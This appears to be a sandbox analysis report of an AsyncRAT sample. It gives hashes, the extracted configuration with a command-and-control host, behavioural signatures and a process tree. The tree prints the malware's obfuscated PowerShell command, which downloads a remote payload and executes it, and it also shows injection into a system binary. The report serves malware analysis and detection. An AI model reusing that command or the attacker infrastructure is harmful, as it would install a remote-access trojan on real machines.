asyncrat | 414566a9fa390bf5414ecfd83484acc8bf24824086f1f350cb7e0f8c5a37c48f

Analysis

max time kernel
1109s
max time network
1196s
platform
windows10_x64
resource
win10-20220310-en
submitted
13-04-2022 19:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HWGYLCBITDLEFLATIXCZS.vbs
Size

3KB
MD5

e9cc67f9dc37b896f40ee439da6e4c38
SHA1

ca2e75b9a9828ed85d126ea89937272449b3b123
SHA256

414566a9fa390bf5414ecfd83484acc8bf24824086f1f350cb7e0f8c5a37c48f
SHA512

208a6cb226cb1097b63cda7e8e5f982ca2866d6690fce63e4ecee688edc657d8fcc5986ee9720dc4bff80a9b0b6220336b52adc3503b07944cb2ed69b21ddff4

Score

10^/10

asyncrat power rat

Malware Config

Extracted

Family

asyncrat

Version

2022 | Edit 3LOSH RAT

Botnet

POWER

mekhocairos.linkpc.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Process spawned unexpected child process 8 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2812	2596	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4088	2596	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3628	4220	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4372	4312	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	4384	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	376	2916	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4200	3280	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	308	1356	powershell.exe

Async RAT payload 9 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1136-228-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/1136-229-0x000000000040C74E-mapping.dmp	asyncrat
behavioral2/memory/1136-244-0x0000000000D60000-0x0000000000D88000-memory.dmp	asyncrat
behavioral2/memory/4100-281-0x000000000040C74E-mapping.dmp	asyncrat
behavioral2/memory/4692-318-0x000000000040C74E-mapping.dmp	asyncrat
behavioral2/memory/1292-363-0x000000000040C74E-mapping.dmp	asyncrat
behavioral2/memory/3892-400-0x000000000040C74E-mapping.dmp	asyncrat
behavioral2/memory/4524-438-0x000000000040C74E-mapping.dmp	asyncrat
behavioral2/memory/316-476-0x000000000040C74E-mapping.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 2812 powershell.exe

flow	pid	process
2	2812	powershell.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3748 set thread context of 1136	3748	powershell.exe	aspnet_compiler.exe
PID 2256 set thread context of 4100	2256	powershell.exe	aspnet_compiler.exe
PID 4536 set thread context of 4692	4536	powershell.exe	aspnet_compiler.exe
PID 5060 set thread context of 1292	5060	powershell.exe	aspnet_compiler.exe
PID 3176 set thread context of 3892	3176	powershell.exe	aspnet_compiler.exe
PID 4628 set thread context of 4524	4628	powershell.exe	aspnet_compiler.exe
PID 8 set thread context of 316	8	powershell.exe	aspnet_compiler.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2812	powershell.exe
2812	powershell.exe
2812	powershell.exe
4016	powershell.exe
4016	powershell.exe
4016	powershell.exe
4088	powershell.exe
4088	powershell.exe
4088	powershell.exe
3748	powershell.exe
3748	powershell.exe
3748	powershell.exe
3628	powershell.exe
3628	powershell.exe
3628	powershell.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
4372	powershell.exe
4372	powershell.exe
4372	powershell.exe
4536	powershell.exe
4536	powershell.exe
4536	powershell.exe
4872	powershell.exe
4872	powershell.exe
4872	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
376	powershell.exe
376	powershell.exe
376	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
4200	powershell.exe
4200	powershell.exe
4200	powershell.exe
4628	powershell.exe
4628	powershell.exe
4628	powershell.exe
308	powershell.exe
308	powershell.exe
308	powershell.exe
8	powershell.exe
8	powershell.exe
8	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	3748	powershell.exe
Token: SeIncreaseQuotaPrivilege	4016	powershell.exe
Token: SeSecurityPrivilege	4016	powershell.exe
Token: SeTakeOwnershipPrivilege	4016	powershell.exe
Token: SeLoadDriverPrivilege	4016	powershell.exe
Token: SeSystemProfilePrivilege	4016	powershell.exe
Token: SeSystemtimePrivilege	4016	powershell.exe
Token: SeProfSingleProcessPrivilege	4016	powershell.exe
Token: SeIncBasePriorityPrivilege	4016	powershell.exe
Token: SeCreatePagefilePrivilege	4016	powershell.exe
Token: SeBackupPrivilege	4016	powershell.exe
Token: SeRestorePrivilege	4016	powershell.exe
Token: SeShutdownPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeSystemEnvironmentPrivilege	4016	powershell.exe
Token: SeRemoteShutdownPrivilege	4016	powershell.exe
Token: SeUndockPrivilege	4016	powershell.exe
Token: SeManageVolumePrivilege	4016	powershell.exe
Token: 33	4016	powershell.exe
Token: 34	4016	powershell.exe
Token: 35	4016	powershell.exe
Token: 36	4016	powershell.exe
Token: SeIncreaseQuotaPrivilege	4016	powershell.exe
Token: SeSecurityPrivilege	4016	powershell.exe
Token: SeTakeOwnershipPrivilege	4016	powershell.exe
Token: SeLoadDriverPrivilege	4016	powershell.exe
Token: SeSystemProfilePrivilege	4016	powershell.exe
Token: SeSystemtimePrivilege	4016	powershell.exe
Token: SeProfSingleProcessPrivilege	4016	powershell.exe
Token: SeIncBasePriorityPrivilege	4016	powershell.exe
Token: SeCreatePagefilePrivilege	4016	powershell.exe
Token: SeBackupPrivilege	4016	powershell.exe
Token: SeRestorePrivilege	4016	powershell.exe
Token: SeShutdownPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeSystemEnvironmentPrivilege	4016	powershell.exe
Token: SeRemoteShutdownPrivilege	4016	powershell.exe
Token: SeUndockPrivilege	4016	powershell.exe
Token: SeManageVolumePrivilege	4016	powershell.exe
Token: 33	4016	powershell.exe
Token: 34	4016	powershell.exe
Token: 35	4016	powershell.exe
Token: 36	4016	powershell.exe
Token: SeIncreaseQuotaPrivilege	4016	powershell.exe
Token: SeSecurityPrivilege	4016	powershell.exe
Token: SeTakeOwnershipPrivilege	4016	powershell.exe
Token: SeLoadDriverPrivilege	4016	powershell.exe
Token: SeSystemProfilePrivilege	4016	powershell.exe
Token: SeSystemtimePrivilege	4016	powershell.exe
Token: SeProfSingleProcessPrivilege	4016	powershell.exe
Token: SeIncBasePriorityPrivilege	4016	powershell.exe
Token: SeCreatePagefilePrivilege	4016	powershell.exe
Token: SeBackupPrivilege	4016	powershell.exe
Token: SeRestorePrivilege	4016	powershell.exe
Token: SeShutdownPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeSystemEnvironmentPrivilege	4016	powershell.exe
Token: SeRemoteShutdownPrivilege	4016	powershell.exe
Token: SeUndockPrivilege	4016	powershell.exe
Token: SeManageVolumePrivilege	4016	powershell.exe
Token: 33	4016	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

powershell.exepowershell.exepowershell.execmd.exepowershell.exepowershell.execmd.exepowershell.exepowershell.execmd.exepowershell.exepowershell.execmd.exepowershell.exepowershell.execmd.exepowershell.exe

description	pid	process	target process
PID 2812 wrote to memory of 4016	2812	powershell.exe	powershell.exe
PID 2812 wrote to memory of 4016	2812	powershell.exe	powershell.exe
PID 4016 wrote to memory of 164	4016	powershell.exe	WScript.exe
PID 4016 wrote to memory of 164	4016	powershell.exe	WScript.exe
PID 4088 wrote to memory of 1448	4088	powershell.exe	cmd.exe
PID 4088 wrote to memory of 1448	4088	powershell.exe	cmd.exe
PID 1448 wrote to memory of 3748	1448	cmd.exe	powershell.exe
PID 1448 wrote to memory of 3748	1448	cmd.exe	powershell.exe
PID 3748 wrote to memory of 1136	3748	powershell.exe	aspnet_compiler.exe
PID 3748 wrote to memory of 1136	3748	powershell.exe	aspnet_compiler.exe
PID 3748 wrote to memory of 1136	3748	powershell.exe	aspnet_compiler.exe
PID 3748 wrote to memory of 1136	3748	powershell.exe	aspnet_compiler.exe
PID 3748 wrote to memory of 1136	3748	powershell.exe	aspnet_compiler.exe
PID 3748 wrote to memory of 1136	3748	powershell.exe	aspnet_compiler.exe
PID 3748 wrote to memory of 1136	3748	powershell.exe	aspnet_compiler.exe
PID 3748 wrote to memory of 1136	3748	powershell.exe	aspnet_compiler.exe
PID 3628 wrote to memory of 3272	3628	powershell.exe	cmd.exe
PID 3628 wrote to memory of 3272	3628	powershell.exe	cmd.exe
PID 3272 wrote to memory of 2256	3272	cmd.exe	powershell.exe
PID 3272 wrote to memory of 2256	3272	cmd.exe	powershell.exe
PID 2256 wrote to memory of 4100	2256	powershell.exe	aspnet_compiler.exe
PID 2256 wrote to memory of 4100	2256	powershell.exe	aspnet_compiler.exe
PID 2256 wrote to memory of 4100	2256	powershell.exe	aspnet_compiler.exe
PID 2256 wrote to memory of 4100	2256	powershell.exe	aspnet_compiler.exe
PID 2256 wrote to memory of 4100	2256	powershell.exe	aspnet_compiler.exe
PID 2256 wrote to memory of 4100	2256	powershell.exe	aspnet_compiler.exe
PID 2256 wrote to memory of 4100	2256	powershell.exe	aspnet_compiler.exe
PID 2256 wrote to memory of 4100	2256	powershell.exe	aspnet_compiler.exe
PID 4372 wrote to memory of 4524	4372	powershell.exe	cmd.exe
PID 4372 wrote to memory of 4524	4372	powershell.exe	cmd.exe
PID 4524 wrote to memory of 4536	4524	cmd.exe	powershell.exe
PID 4524 wrote to memory of 4536	4524	cmd.exe	powershell.exe
PID 4536 wrote to memory of 4692	4536	powershell.exe	aspnet_compiler.exe
PID 4536 wrote to memory of 4692	4536	powershell.exe	aspnet_compiler.exe
PID 4536 wrote to memory of 4692	4536	powershell.exe	aspnet_compiler.exe
PID 4536 wrote to memory of 4692	4536	powershell.exe	aspnet_compiler.exe
PID 4536 wrote to memory of 4692	4536	powershell.exe	aspnet_compiler.exe
PID 4536 wrote to memory of 4692	4536	powershell.exe	aspnet_compiler.exe
PID 4536 wrote to memory of 4692	4536	powershell.exe	aspnet_compiler.exe
PID 4536 wrote to memory of 4692	4536	powershell.exe	aspnet_compiler.exe
PID 4872 wrote to memory of 5040	4872	powershell.exe	cmd.exe
PID 4872 wrote to memory of 5040	4872	powershell.exe	cmd.exe
PID 5040 wrote to memory of 5060	5040	cmd.exe	powershell.exe
PID 5040 wrote to memory of 5060	5040	cmd.exe	powershell.exe
PID 5060 wrote to memory of 1448	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 1448	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 1448	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 2552	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 2552	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 2552	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 1292	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 1292	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 1292	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 1292	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 1292	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 1292	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 1292	5060	powershell.exe	aspnet_compiler.exe
PID 5060 wrote to memory of 1292	5060	powershell.exe	aspnet_compiler.exe
PID 376 wrote to memory of 824	376	powershell.exe	cmd.exe
PID 376 wrote to memory of 824	376	powershell.exe	cmd.exe
PID 824 wrote to memory of 3176	824	cmd.exe	powershell.exe
PID 824 wrote to memory of 3176	824	cmd.exe	powershell.exe
PID 3176 wrote to memory of 3892	3176	powershell.exe	aspnet_compiler.exe
PID 3176 wrote to memory of 3892	3176	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HWGYLCBITDLEFLATIXCZS.vbs"
1⤵
PID:2280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $SSLGBFHPYGWJOSVOSAXSOI = '[S</%12(}(3%!97^-)604175EM.I12%<*5&{^114^3(+(239$8MREAdER]'.Replace('</%12(}(3%!97^-)604175','ySt').Replace('12%<*5&{^114^3(+(239$8','O.StREA');$OSXYPCZAVJGVPJKCCOIRGP = ($SSLGBFHPYGWJOSVOSAXSOI -Join '')| .('{1}{0}'-f'EX','I');$BACQWYOKUYXPPAAAYSGKSH = '[SyS36^{5*+\__(+!0*]!74^+*T.W$4!/#&{]{%20(\_!@#+0^_ST]'.Replace('36^{5*+\__(+!0*]!74^+*','TEm.NE').Replace('$4!/#&{]{%20(\_!@#+0^_','EbREquE');$VLOPCCVJLTABAEOPZHLLUP = ($BACQWYOKUYXPPAAAYSGKSH -Join '')| .('{1}{0}'-f'EX','I');$EQRAEEEFHESLXKSSOJGAXF = 'Cr)#-8%2!@$/36)-^3)%[8-=TE'.Replace(')#-8%2!@$/36)-^3)%[8-=','Ea');$FLNDLCBQWUUJIOYRAXLXDD = 'GE9)4#(![(]#$3252)+]$<+4onSE'.Replace('9)4#(![(]#$3252)+]$<+4','tRESp');$YOUCSWTBCHGKPSZLDUSJQL = 'GE!7@}+-]*)#7+8(-0%8@!5\REam'.Replace('!7@}+-]*)#7+8(-0%8@!5\','tRESponSESt');$RIROKYAAOQNNTDPHRCXRLA = 'RE8+8(-=8%7@+_+<$0-\78^{nD'.Replace('8+8(-=8%7@+_+<$0-\78^{','aDToE'); .('{1}{0}'-f'EX','I')($OSXYPCZAVJGVPJKCCOIRGP::new($VLOPCCVJLTABAEOPZHLLUP::$EQRAEEEFHESLXKSSOJGAXF('https://mygi.info/tmp/LAO.txt').$FLNDLCBQWUUJIOYRAXLXDD().$YOUCSWTBCHGKPSZLDUSJQL()).$RIROKYAAOQNNTDPHRCXRLA())
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.ps1'"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.vbs"
3⤵
PID:164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:1448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\ZZYIBLYVDZNVKQAQKAHGUR.ps1'"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:1136

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.vbs"
1⤵
PID:2812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:3272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\ZZYIBLYVDZNVKQAQKAHGUR.ps1'"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:4100

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.vbs"
1⤵
PID:4260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:4524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\ZZYIBLYVDZNVKQAQKAHGUR.ps1'"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4536

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:4692

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.vbs"
1⤵
PID:4804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\ZZYIBLYVDZNVKQAQKAHGUR.ps1'"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5060

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:1448

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:2552

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:1292

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.vbs"
1⤵
PID:2884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\ZZYIBLYVDZNVKQAQKAHGUR.ps1'"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3176

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:3892

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.vbs"
1⤵
PID:952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
PID:4200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat""
2⤵
PID:4544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\ZZYIBLYVDZNVKQAQKAHGUR.ps1'"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4628

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:4524

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.vbs"
1⤵
PID:724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
PID:308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat""
2⤵
PID:3192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\ZZYIBLYVDZNVKQAQKAHGUR.ps1'"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:316

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.bat
Filesize
127B

MD5
291053af2ecb7cff77dbabe768ae2fb2

SHA1
76c96ac3ea1f1a887472e016e9d3e5cc73276e51

SHA256
38d16b7dfc230a37075cce9cbd04e71e6ef0b977d1220f4685d127f7f5235901

SHA512
d8f53f0d62a9df75deb39a244b9b7b3663823d7c14ac8ef49cb19222e9527d602cb4d6400b99535fbaf2fd9fcc4d909a757e519a39913c95df5412bd43c17a02

Download Submit
C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.ps1
Filesize
457B

MD5
ba5c8e113d1ce12d42cb2b224bb52334

SHA1
50d61ebf278d1e0fc6e34877d0b22fbd6296aa2d

SHA256
e682b00bc12bbcbcf674a69ed25738e28d58d8e3144bdc699672f3cbb25497cb

SHA512
054f22049e962b3150d1748ca23390aaeaaa3856f04b53b0d106db9f3b140df1db9c4ac017b1609d2e3d8901357f1d98d168ccf7008a7d5e2614f9224272bb27

Download Submit
C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\PIFRCDZJLSINPZSRBPYVRN.vbs
Filesize
1KB

MD5
6f79214c4757fdba103880855712104e

SHA1
39362423a8a5a925ab74054e1ecf42fa064bbe76

SHA256
f8ac84a30818a746b6c69296bcf4723607047a0f25b3b9ad94aec6d1a95e199d

SHA512
c954c16a3d4f7c89ea53c60b0d141c99eb61c6b729fedb2a2fb9e6ccc47d95deda5db116ae0e2c30182afc83cd1671e27b5fef54914dce2720554cfc4a063654

Download Submit
C:\ProgramData\PIFRCDZJLSINPZSRBPYVRN\ZZYIBLYVDZNVKQAQKAHGUR.ps1
Filesize
179KB

MD5
6cb53080002d8311c089c46950edd93d

SHA1
cfe2f6426aed835f37279891c4e5361402590be1

SHA256
7c7839d85d966823e0eff5244202c8ea39d550b90fdc0e4d13ad18e5a057ed0f

SHA512
2b6f10885f1bfc33e5a75c0aec824bcf9d505da4c1519061214ac0eb5a6d5829b19945f14923de9dcf325bdd2a8159c28f08145b1224b7e39997471cc19d232a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
c6df42273e8ef4c290216ee667653c3c

SHA1
93e77d2cd94ba1ede2fe16e52ccb10c7c981820d

SHA256
67fbad14bc8e07082a42e6b1b8a16542c8f42a41dcf1207407edb8ae9a9368d4

SHA512
eac9e3249f132d4ee0ff09c34e706958a4c6dd5a6a6e202773fb945477e58accf2ddf55a130290be790b16f40d269204c4bc213e8d3ccfd063be3554cbbdf083

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log
Filesize
425B

MD5
605f809fab8c19729d39d075f7ffdb53

SHA1
c546f877c9bd53563174a90312a8337fdfc5fdd9

SHA256
6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

SHA512
82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
fe904a990b147bc882ec9e033cfc5ddd

SHA1
4aef48d46b21b38ae2d9e4db7d66aa074dadd6a6

SHA256
a2c07145bd9e6a92b4b676c15849c3ff8071bd6165d8877ae57ce0717343ceb2

SHA512
8899b169f687415aa5db8420a3580b837d76b91f09f1e31fdfe0c1fce9d09936bf721ba24af16fb95861589c386289f4752cb3215df1eddaac274bb7917e6151

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
56a333f899ba2925e3583dac7a673ae6

SHA1
a51368750f07b04fff7f7effd9c162f5a98cc75a

SHA256
